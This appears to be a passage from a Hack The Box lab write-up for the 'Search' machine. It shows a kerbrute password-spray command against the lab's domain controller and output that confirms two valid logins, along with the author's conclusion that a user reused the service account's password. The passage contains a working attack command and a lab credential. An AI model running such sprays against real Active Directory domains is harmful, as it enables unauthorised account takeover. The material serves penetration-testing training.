Password Spray


Given the nature of the compromised account, web_svc, being a valid “service account”, it must be managed somehow by “someone”. Therefore, it is rather reasonable to assume that “someone” might have provided their own password for ease of access. I will test just that in the following sections.

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ kerbrute passwordspray --dc research.search.htb -d SEARCH.HTB users.txt @3ONEmillionbaby
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 01/30/24 - Ronnie Flathers @ropnop
 
2024/01/30 17:45:18 >  Using KDC(s):
2024/01/30 17:45:18 >  	research.search.htb:88
 
2024/01/30 17:45:18 >  [+] VALID LOGIN:	 Edgar.Jacobs@SEARCH.HTB:@3ONEmillionbaby
2024/01/30 17:45:19 >  [+] VALID LOGIN:	 web_svc@SEARCH.HTB:@3ONEmillionbaby
2024/01/30 17:45:19 >  Done! Tested 105 logins (2 successes) in 0.721 seconds

Password reuse confirmed The edgar.jaconbs user was that “someone” behind the service account, web_svc Validation will be made by requesting for a TGT